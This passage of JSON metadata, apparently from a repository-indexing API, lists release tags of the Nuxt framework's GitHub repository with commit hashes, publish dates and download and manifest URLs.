nuxt/nuxt/releases/tag/v3.17.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.7/manifests"},{"name":"v4.0.0-rc.0","sha":"0344123b3c2c46c6f591c42696eef8ffc6504947","kind":"commit","published_at":"2025-07-07T22:42:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-rc.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-rc.0/manifests"},{"name":"v3.17.6","sha":"9867529347c072efb8da5806f6a973cd853d72e1","kind":"commit","published_at":"2025-07-01T16:46:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.6/manifests"},{"name":"v4.0.0-alpha.4","sha":"14dd686b8b47beecf024318ae304919cd81ab4ad","kind":"commit","published_at":"2025-06-27T13:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.4/manifests"},{"name":"v4.0.0-alpha.3","sha":"8b9e1a1ef774dab5a36a94268439079de1a887de","kind":"commit","published_at":"2025-06-26T16:17:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.3/manifests"},{"name":"v4.0.0-alpha.2","sha":"4b56bb92b9242df959f091e1d2be72cd492f30ca","kind":"commit","published_at":"2025-06-12T09:16:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.2/manifests"},{"name":"v3.17.5","sha":"0fa7ff9908c8a573c1efedf216cdf5ec901820af","kind":"commit","published_at":"2025-06-03T21:38:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.5/manifests"},{"name":"v4.0.0-alpha.1","sha":"e379ac3e8dd3b37ca26a01d0dc0ffcbc46ece1aa","kind":"commit","published_at":"2025-06-02T19:45:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v4.0.0-alpha.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v4.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v4.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v4.0.0-alpha.1/manifests"},{"name":"v3.17.4","sha":"f7437ce28f83723492a1e540a9b43c56c469234a","kind":"commit","published_at":"2025-05-20T19:57:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.4/manifests"},{"name":"v3.17.3","sha":"c6dad342e6718377136c675c64d6e20c420dea81","kind":"commit","published_at":"2025-05-12T13:58:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.3/manifests"},{"name":"v3.17.2","sha":"346bb2bfe3324b353ec65d4b2f09b46e0a7c5c71","kind":"commit","published_at":"2025-05-05T08:54:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.2/manifests"},{"name":"v3.17.1","sha":"de02d2312d79f0bae4eb382a565253b7ddc98f86","kind":"commit","published_at":"2025-04-29T00:20:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.1/manifests"},{"name":"v3.17.0","sha":"fa4618c801a3549b56477b8e880f085f527baf84","kind":"commit","published_at":"2025-04-27T22:38:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.17.0/manifests"},{"name":"v3.16.2","sha":"be46b279d12b2ebca676a9db05244ae64c980f78","kind":"commit","published_at":"2025-04-01T10:36:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.2/manifests"},{"name":"v3.16.1","sha":"cd38de24c14e586b61f742e902ad1e3c2ebd2d31","kind":"commit","published_at":"2025-03-19T16:49:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.1/manifests"},{"name":"v3.16.0","sha":"7a37a982535f6da0cef16c4d7d3a81df42429ec1","kind":"commit","published_at":"2025-03-07T14:21:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.16.0/manifests"},{"name":"v3.15.4","sha":"244da170dd61e9aa790d5e9fdf988aa0a128d55a","kind":"commit","published_at":"2025-01-29T08:03:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.4/manifests"},{"name":"v3.15.3","sha":"048f974eba45e4909dcf53e8ce692fae3c5db37f","kind":"commit","published_at":"2025-01-24T23:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.3/manifests"},{"name":"v3.15.2","sha":"87a0ee59aec69c24a83993dcd329ecc9d25c3df3","kind":"commit","published_at":"2025-01-15T15:16:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.2/manifests"},{"name":"v3.15.1","sha":"fdf6e879ea00c9e313458e32dc911ca846a525d4","kind":"commit","published_at":"2025-01-05T12:04:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.1/manifests"},{"name":"v3.15.0","sha":"1acc9a0a3adabf250b979e58ed634874a9d90ddd","kind":"commit","published_at":"2024-12-24T23:47:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.15.0/manifests"},{"name":"v3.14.1592","sha":"3894e9d7c1fdeed11ea380cc84f7641d90f52a46","kind":"commit","published_at":"2024-11-19T20:52:02.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.1592","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.1592","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.1592","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.1592/manifests"},{"name":"v3.14.159","sha":"625689077052ccbea0812defe34e13edb4ca0983","kind":"commit","published_at":"2024-11-06T11:34:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.159","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.159","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.159","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.159/manifests"},{"name":"v3.14.0","sha":"42420521c7eaf3480191f990e4fb545954f8f551","kind":"commit","published_at":"2024-11-04T15:46:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.14.0/manifests"},{"name":"v3.13.2","sha":"a50725300f31ca590f0dd4db16db97e3af9a0b18","kind":"commit","published_at":"2024-09-15T21:03:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.2/manifests"},{"name":"v3.13.1","sha":"9983e83dae92195e58812e2a106dc9660e0cb559","kind":"commit","published_at":"2024-09-04T09:39:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.1/manifests"},{"name":"v3.13.0","sha":"74ef96d096d0045fd00fccd880c1dbbfea51e22a","kind":"commit","published_at":"2024-08-22T16:03:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.13.0/manifests"},{"name":"v3.12.4","sha":"4a1349f700aa6af14253de7363acf243ecad2c02","kind":"commit","published_at":"2024-07-18T22:30:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.4/manifests"},{"name":"v3.12.3","sha":"a9fcd82d8eeaf750205838a4e96e9478f18a154f","kind":"commit","published_at":"2024-07-02T15:05:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.3/manifests"},{"name":"v2.18.1","sha":"81f5335f26b4f593004a503f2ec7d9a6fd723b64","kind":"tag","published_at":"2024-06-28T11:35:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.1/manifests"},{"name":"v2.18.0","sha":"9f5fc19018ae2d6c9afe2ece12d86cba7bbed8f8","kind":"tag","published_at":"2024-06-27T15:41:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.18.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.18.0/manifests"},{"name":"v3.12.2","sha":"8578e2bd62bdf3ce9dab70c7241a3953feb043b7","kind":"commit","published_at":"2024-06-16T07:36:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.2/manifests"},{"name":"v2.17.4","sha":"5b437353d0ae6972e7a35a47feb8062949daf625","kind":"tag","published_at":"2024-06-14T13:46:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.4/manifests"},{"name":"v3.12.1","sha":"41fc45da254408921972ab626101c41cea70de32","kind":"commit","published_at":"2024-06-11T10:50:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.1/manifests"},{"name":"v3.12.0","sha":"9f06842fa1b323bd0e0911b0335a091a9052b5c3","kind":"commit","published_at":"2024-06-11T08:44:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.12.0/manifests"},{"name":"@nuxt/ui-templates@1.3.3","sha":"a16107b93bad4fd5a25d48598967e11b59b7baf3","kind":"tag","published_at":"2024-04-05T12:43:20.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.3/manifests"},{"name":"v3.11.2","sha":"3c90aaf8e21955cf0644df2e0b09e3e33441e8e2","kind":"commit","published_at":"2024-04-04T16:04:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.2/manifests"},{"name":"@nuxt/ui-templates@1.3.2","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.2/manifests"},{"name":"@nuxt/ui-assets@0.2.1","sha":"61297118022700364431a76ee0d5fd3ac7b0b61c","kind":"tag","published_at":"2024-04-02T14:38:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-assets@0.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-assets@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-assets%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-assets@0.2.1/manifests"},{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3",